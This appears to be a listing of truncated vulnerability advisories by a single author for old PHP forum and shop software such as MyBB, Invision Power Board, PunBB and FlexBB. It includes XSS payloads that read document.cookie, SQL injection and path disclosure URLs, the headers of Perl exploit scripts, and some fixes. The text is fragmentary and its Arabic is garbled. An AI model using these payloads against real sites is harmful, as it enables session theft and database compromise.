Zen-Cart 1.3.0.2 Full Path Disclosure

Zen-Cart 1.3.0.2 En: Zen-Cart .. E-commerce PHP Program - This Bug Can Tell U Where The Program @ Server Ar: #1575;#1604;#1600; #1586;#1610;#1606; #1603;#1575;#1585;#1578; .. #1576;#1585;#1606;#1575;#1605;#1580; #1578;#1580;#1575;#1585;#1577;

MyBB 1.1.2 New XSS

// MyBB 1.1.2 New XSS File :- private.php Ver. :- $do = $mybb-input['do']; Line :- 260 Action :- Preview HTTP Proof :-

Invision Community Blog .. Bugs

[LEFT] Invision Community Blog .. Bugs SQL Injection :- Filename :- mod.php Function name :- do_mmod() The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -- * Arabic * [/LEFT] [RIGHT] ÇáãÊÛíÑ $ids ÛíÑ ãÝáÊÑ Úä ØÑíÞ ÇáÏÇáå intval æåæ ÈÔßá ãÕÝæÝå ..

SaPHPLesson 3.0 Multbugs

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename:- show.php Line:- 102 [code] $hrow[] = $Row2;[/code] Fix :- Add To Line [ 11 ] /show.php This Code :- we add the code to global to fix all unfilter

PunBB 1.2.11 Cross-Site Scripting

PunBB 1.2.11 Cross-Site Scripting File name :- misc.php Action:- Send Email Line :- 123 [php] redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']); [/php] The $_POST['redirect_url'] = Unfilter Input Exploit :- Send POST Request [code] GET

Invision Gallery 2.0.6 ( SQL Injection )

[left] Invision Gallery 2.0.6 ( SQL Injection ) File :- modules/gallery/post.php Line :- 943 Bug By :- Devil-00 * Welcome Back ( Security4arab ) * Arabian Security WebSites www.s4a.cc www.securitygurus.net

Invision Power Board v2.1.5 Remote SQL Injection

Invision Power Board v2.1.5 Remote SQL Injection Filename:- func_mod.php Functionname:- post_delete() Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^

OpenBB 1.0.8 Full Path Disclosure

OpenBB 1.0.8 Full Path Disclosure Bug Found By :- Devil-00 Gr33tz :- Www.securitygurus.neT Rock Master Hackers Pal n0m3rcy -= 1-2 =- Full Path Disclosure Exploits :-

MyBB 1.1.1 Local SQL Injections

MyBB Local SQL Injections .. [ This Local Injections Only For Admin ] * 1 * [code] adminfunctions.php , line 730 $db-query(INSERT INTO .TABLE_PREFIX.adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES

WWWThread RC 3 MultBugs

[code]// --- WWWThread RC 3 MultBugs --- // * D3vil-0x1 | Devil-00 * www.securitygurus.net * Gr33tz - HACKERS PAL | n0m3rcy | - All Others i forgot them :)) //-//

FlexBB 0.5.5 Bypass Exploit

#!/usr/bin/perl -w # FlexBB = 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3 # # Milw0rm ID :- #http://www.milw0rm.com/auth.php?id=1539 # D3vil-0x1 | Devil-00 BlackHat :) # # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET TO DO YOUR CONFIG !! # DONT

MyBB 1.10 New XSS ' member.php '

//-- MyBB 1.10 New XSS ' member.php ' --// Webattack :- 1- Logout 2- Open Firefox 3- Use [ Live HTTP Headers ] 4- Do Register 5- Agree It 6- Edit Cookies By Live HTTP Headers 7- Add This Cookies :D mybb[referrer]=/inputbHTML/binput; //-- FixIT --//

MyBB 1.10 New CrossSiteScripting ' member.php '

//-- MyBB 1.10 New CrossSiteScripting ' member.php ' --// Webattack :- /mybb/member.php?action=do_loginusername=[usrname]password=[pass]url=scriptalert(1);/script //-- FixIT --// Open member.php GoTo Line :- 1030 .. if($mybb-input['url']) {

MyBB 1.10 'newthread.php' CrossSiteScripting

MyBB 1.10 'newthread.php' CrossSiteScripting [ Devil-00 | D3vil-0x1 ] [*] Conditions [*] 1- your unregisterd user 2- you have permissions to do newthread [---] do newthread with this username :- scriptalert(document.cookie);/scriptD3vil-0x1 Then Preview it ;)

MyBB 1.10 New CrossSiteScripting

MyBB 1.10 CrossSiteScripting File :- inc/functions_post.php BugTraqer :- Devil-00 [EMAIL PROTECTED] we can do attack by some unfilter tags :- Post New Thread Or New Replay With This Code :D And Try To Move The Mouse Over The Email ;) [code]

ArabPortal 2.0 Stable CrossSiteScripting

ArabPortal 2.0 Stable .. The Best Arbian Portal Forums System * The Bug Is XSS * [code] online.php?title=D3vil-0x1/titleXSSCODE/XSS download.php?action=byuseruserid=1title=D3vil-0x1/titleXSSCODE/XSS [/code] [center] ^^ Secumod 0.1 Anti-XSS SQL Injection ^^ [ Get It For Free !! Only 15$ And

MyBB 1.10 Full Path Disclosure

D3vil-0x1 | Devil-00 New MyBB bug that will giv you the ' Full Path Disclosure ' at vic. server MyBB 1.10 .. New Bugs 1- Full Path Disclosure = mybb/polls.php?action=votepid=[PID]option[]=null - Where PID Poll ID

MyBB 1.04 Perl Exploit

#!/usr/bin/perl -w # MyBB = 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3 # # Milw0rm ID :- # http://www.milw0rm.com/auth.php?id=1539 # D3vil-0x1 | Devil-00 BlackHat :) # # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET

MyBB 1.0.4 New SQL Injection

MyBB 1.0.4 New SQL Injection D3vil-0x1 File :- search.php 580 to 592 /* _START_ */ if($mybb-input['forums'] != all) { if(!is_array($mybb-input['forums'])) -- We Break It By forums[]=-1 {

MyBB 1.3 NewSQL Injection

MyBB New SQL Injection D3vil-0x1 Devil-00 Milw0rm ID :- http://www.milw0rm.com/auth.php?id=1320 The Inf.File :- misc.php Linez :- [code] $buddies = $mybb-user['buddylist']; $namesarray = explode(,,$buddies); if(is_array($namesarray)) {

MyBB 1.2 usercp2.php [ $url ] CrossSiteScripting ( XSS )

Invalid characters removed from From: [EMAIL PROTECTED], |@securityfocus.com, ## MyBB 1.02 usercp2.php XSS ##--## ## Devil-00 D3vil-0x1 - Attacking MyBB :)## ## ## ## [EMAIL PROTECTED]## ## ##

MyBB 1.2 Local File Incusion

Invalid characters removed from From: [EMAIL PROTECTED], |@securityfocus.com, D3vil-0x1 MyBB Bug ### ## Local File Inclusion ## ## MyBB 1.2 - Admin Can Include Local File :) ## File :- admin/plugins.php Line :- 51

Re: MyBB 1.0.2 SQL injection in usercp.php

Hiz .. look at phpMyAdmin or you database threadmode After usergroup .. then you can't edit usergroup to get super acsses to any user you wn't UPDATE Query :- ','','','')/* Only You CAn Edit showsigs showavatars showquickreply ppp tpp daysprune